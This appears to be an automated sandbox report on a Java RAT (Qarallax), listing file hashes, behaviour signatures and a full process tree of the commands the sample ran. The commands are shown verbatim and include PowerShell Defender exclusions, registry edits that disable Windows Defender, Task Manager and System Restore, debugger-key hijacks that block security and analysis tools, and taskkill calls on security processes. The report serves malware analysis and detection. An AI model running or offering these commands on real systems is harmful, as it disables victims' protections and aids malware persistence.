Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    06-08-2020 07:53

General

  • Target

    STATEMENT.jar

  • Size

    410KB

  • MD5

    c97cbc1f72a7a3100781e9e9dd0726c9

  • SHA1

    cfd2845d70ba1de8fa041c844deacf5f72d360b2

  • SHA256

    af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473

  • SHA512

    0592feef2b9dfeeb87fd8dec6682664dbacfd4ec70e7e52d0dd08b39ba3590af4662c0cc5236bbd334e5b06c8a1207d06341b104000d889ebb6454ac2d18f9ba

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 125 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 412 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\STATEMENT.jar
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:728
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      2⤵
        PID:2404
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2976
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1000
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:2868
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:408
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:3828
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:3904
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:3508
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:1356
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:1588
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
        2⤵
        • Views/modifies file attributes
        PID:1724
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3292
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:3960
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:4144
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
            2⤵
              PID:3656
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
              2⤵
                PID:412
              • C:\Windows\System32\taskkill.exe
                "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
                2⤵
                • Kills process with taskkill
                PID:628
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:536
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:2872
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                  2⤵
                    PID:3908
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                    2⤵
                      PID:2396
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                      2⤵
                        PID:1576
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                        2⤵
                          PID:2352
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                          2⤵
                            PID:1000
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:1360
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                              2⤵
                                PID:3104
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                2⤵
                                  PID:4180
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                  2⤵
                                    PID:4200
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                    2⤵
                                      PID:4280
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                      2⤵
                                        PID:4296
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                        2⤵
                                          PID:4396
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                          2⤵
                                            PID:4392
                                          • C:\Windows\System32\taskkill.exe
                                            "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                            2⤵
                                            • Kills process with taskkill
                                            PID:4500
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:4544
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:4588
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                2⤵
                                                  PID:4652
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:4740
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                    2⤵
                                                      PID:4808
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:4880
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe
                                                        2⤵
                                                          PID:4928
                                                          • C:\Windows\system32\reg.exe
                                                            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
                                                            3⤵
                                                              PID:4632
                                                            • C:\Windows\system32\reg.exe
                                                              reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
                                                              3⤵
                                                                PID:4172
                                                            • C:\Windows\System32\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                              2⤵
                                                                PID:4952
                                                              • C:\Windows\System32\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:5064
                                                                • C:\Windows\System32\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                  2⤵
                                                                    PID:572
                                                                  • C:\Windows\System32\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                    2⤵
                                                                      PID:2096
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                      2⤵
                                                                        PID:1692
                                                                      • C:\Windows\System32\taskkill.exe
                                                                        "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:4104
                                                                      • C:\Windows\System32\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                        2⤵
                                                                          PID:4236
                                                                        • C:\Windows\System32\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                          2⤵
                                                                            PID:3828
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:1448
                                                                            • C:\Windows\System32\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                              2⤵
                                                                                PID:1364
                                                                              • C:\Windows\System32\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                2⤵
                                                                                  PID:2352
                                                                                • C:\Windows\System32\taskkill.exe
                                                                                  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4388
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe
                                                                                  2⤵
                                                                                    PID:4660
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                                                                      3⤵
                                                                                        PID:4424
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                                                                        3⤵
                                                                                          PID:4816
                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                        "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4672
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe
                                                                                        2⤵
                                                                                          PID:4688
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                                            3⤵
                                                                                              PID:4576
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                                              3⤵
                                                                                                PID:4900
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd.exe
                                                                                              2⤵
                                                                                                PID:4772
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                                                  3⤵
                                                                                                    PID:4844
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                                                    3⤵
                                                                                                      PID:4640
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd.exe
                                                                                                    2⤵
                                                                                                      PID:4652
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                                        3⤵
                                                                                                          PID:4684
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                                          3⤵
                                                                                                            PID:4840
                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                          cmd.exe
                                                                                                          2⤵
                                                                                                            PID:1136
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                                              3⤵
                                                                                                                PID:5044
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                                                3⤵
                                                                                                                  PID:1416
                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                                                                2⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:1960
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                cmd.exe
                                                                                                                2⤵
                                                                                                                  PID:3908
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:4952
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:3720
                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                      cmd.exe
                                                                                                                      2⤵
                                                                                                                        PID:2876
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3840
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1356
                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                            cmd.exe
                                                                                                                            2⤵
                                                                                                                              PID:412
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:4156
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:2396
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  cmd.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:4316
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:408
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:636
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1576
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4204
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2224
                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                              cmd.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:3948
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4468
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4160
                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                    cmd.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2352
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4260
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4104
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          cmd.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5056
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3848
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4604
                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                                                                                                2⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:3876
                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                cmd.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4360
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4356
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4748
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      cmd.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4700
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2716
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4928
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            cmd.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:5008
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4424
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4196
                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4364
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4280
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4920
                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4904
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4024
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4888
                                                                                                                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:3384
                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4684
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5088
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2100
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4956
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1252
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1952
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4952
